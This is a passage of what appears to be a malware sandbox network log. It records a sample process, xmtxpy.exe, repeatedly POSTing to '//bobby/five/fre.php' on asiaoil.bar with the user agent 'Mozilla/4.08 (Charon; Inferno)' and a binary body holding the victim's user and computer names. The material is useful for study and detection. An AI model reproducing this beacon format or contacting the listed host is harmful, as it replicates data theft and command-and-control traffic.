                        Server: cloudflare
                        CF-RAY: 6db4472a7d7c9193-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        7 | 192.168.2.22 | 49172 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:08.131839037 CET | 323 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:08.148073912 CET | 323 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:08.291701078 CET | 324 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GAzVwCo6pQjEmafddnL4QX9z1sDFHB2J%2FYbOLf50is46eNnXoOwYOokrFvyBn6ciX3XJ3aLhnc3SW1RSny%2BWp7rsb%2FchkjZeaoltFUzmAOwl3IbNQWt4WAouWFDm8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44570da0591ea-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        70 | 192.168.2.22 | 49236 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:19.840840101 CET | 435 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:19.857125044 CET | 435 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:19.945090055 CET | 436 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jX4p5OL3M4bhKeaGYr6eMZP4ecEb%2BRQKJFJMvHycGUM%2BR1sW8i66slzCERtcv76o3GVZu2AT%2BBb9%2BnWVHSGrEHQ65OlnuuLV3NX69%2BnX0CllH9Ufi1dPL3kXbE9UsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447310d2a918f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        71 | 192.168.2.22 | 49237 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:20.970686913 CET | 437 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:20.987104893 CET | 437 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:21.069719076 CET | 438 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wCsqQDtUNyAdb8N7QE5gpRV6yQp9OM5kLzcDr7AlwMrEbZXvVwvalAee7gk3yYD6lCHsuYIHi9jPPTnfADT3Vv66t86Ej5Rk3p%2BU8OrA6dwgCuh8u7DexDMJSkMrXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447381a755be1-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        72 | 192.168.2.22 | 49238 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:22.072757959 CET | 439 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:22.089340925 CET | 439 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:22.165954113 CET | 440 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SRqidrs3tVmZaXWczrmKsgbZ4wzW0DNHNg57GTGmubIkUghb%2BRZ87SXRzbz4C2tAAPiS7VjMUqurezvKjUarwJZfb4vQq5PhgZ3zf0wd8HEEhwN0s6BL9vHZrcRCQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4473f0b3b9208-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        73 | 192.168.2.22 | 49239 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:23.139723063 CET | 441 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:23.156311989 CET | 441 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:23.219130993 CET | 441 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:23 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wh%2FHtCJ%2F5r2bJkgiHao050klrqU1roeJfG%2B4i6f3I%2FKeYPkYarG1akcmrjP1MjieW7NO3IUngd6ffdEn3ApGf%2BloKJJBXuiDKbgTzbof4laU14sUbhPRo%2BZeW2t2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44745a96792b9-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        74 | 192.168.2.22 | 49240 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:25.193411112 CET | 442 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:25.209836006 CET | 443 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:25.303853035 CET | 443 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:25 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ZOuSqnAuokRLt6j%2BaPucUYURpspSs5959QwqxEaaI65vhxihU%2BSGTldehqd66BkHEec1wRdP8eKXsiuAfROg4bLz4JgpMIkfQ1aSuC9Jn%2BKCRCMyVVG8exy0%2Ffc7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447528eb59094-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        75 | 192.168.2.22 | 49241 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:26.759434938 CET | 444 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:26.775861025 CET | 444 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:26.868480921 CET | 445 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:26 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jDOcGscIXoe9amgDgblodsrhn0vmrU90jrXpu8eubmt%2FtVJmc0fEBfOASTLuxQbUt3Vyn6AzRV98aodD8X4wZ0aRqf1etGTdsv2KXeP8MDKpOfZ2KmYTIdqKCEQiTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4475c4e69691b-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        76 | 192.168.2.22 | 49242 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:27.802325010 CET | 446 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:27.818645954 CET | 446 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:27.877187014 CET | 447 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:27 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2nROjTYrKHq5Dp3zfqoq%2BF08OA0sabm52jF3F7aFN8zXdi%2BsX6Cq%2F1PGMTUNOdZpDBwGOKpy%2F6346z2Ex7OMyy0ds2Scyrm%2B5L4uaz1G2nfp7WA5GPCq2oiQAJpM6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44762ced16963-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        77 | 192.168.2.22 | 49243 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:28.801702023 CET | 448 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:28.817922115 CET448OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:28.894922972 CET449INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:28 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d88FAJAIS01MD7fqAfBFKZ2BhmJxCoOv1Hl6%2FrHHy0nAp1VZ0UmTp2mncxvNOP61QK0xudgAXXNSW%2FHEuL5DLwigS1D%2BHfHJsx5oxzhN7qOtYp8JjADI7dRG6jZTLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447690f816969-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        78 | 192.168.2.22 | 49244 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:29.791358948 CET | 449 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:29.808893919 CET | 450 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:29.883049011 CET | 450 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:29 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y4ckWSdyfKKgK%2FaSnEtfcnQkctDbfArW85YmMzuF2GYtn1Vk9z3zezqrAQm97NN4dlNgg4mlDR6cFowQrcAInwiWKaPPKhv22VNGu%2Fi7%2FjbZEoNLKbqtK0TOhixPTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4476f3c7c9072-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        79 | 192.168.2.22 | 49245 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:30.804450989 CET | 451 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:30.822309017 CET | 451 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:30.900362015 CET | 452 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:30 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mk%2F%2ByckUn75h6rICqGx9cpJuG7dAjWTNBLmPAr%2FZWuFMh6m%2Fl%2FaMElHYxT54c74Wcf%2BgX9vcoEDADUlGA5wqWcrwO%2B3jiZphR9HdBO0OgJ1mWc%2FTatA77PboqFA%2F%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447759aa39113-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        8 | 192.168.2.22 | 49173 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:09.274962902 CET | 325 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:09.292191029 CET | 325 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:09.407815933 CET | 326 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Es%2BCG1ikpvgB48TpSGLWbDWE4lq9KcFNWoR2DepgSQQlwCDx1lJRGNxwRi%2Fuixs5%2FkJ%2BkDAOwOExmpgG%2BFmlHRat148sW8J8clBcEhbV%2BEh21BpaPsALJP5WpoKTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4457809ea6939-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        80 | 192.168.2.22 | 49246 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:31.841167927 CET | 453 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:31.857433081 CET | 453 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:31.928236961 CET | 454 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lkoFlBzh%2FTvOS8G5hZ5h6dPK6YATM%2FnTao2RMMscPCKdFKdF3yBO98Mj55rUC%2BFjMzMKlTeqOz7aj%2Fqw04UBHUPGJ1ayR49HyEd8ogh8KcYhkHXG20zdKy28pHBuBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4477c0a09694f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        81 | 192.168.2.22 | 49247 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:32.863722086 CET | 455 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:32.880721092 CET | 455 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:33.037036896 CET | 456 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:33 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6IjZw4UIYZGNBtRkEhw0RzPzggwNQkdD8cEShbMPEDVfqNl1bXjX9XB1t94CL9pCK1%2FBnfmx78Swjpa1RBrVYoWA186HoyYm1jceSa4D8bUv8CTvYDnbykWZ8ANQ%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db447827e0d5b92-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        9 | 192.168.2.22 | 49174 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:10.415911913 CET | 326 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
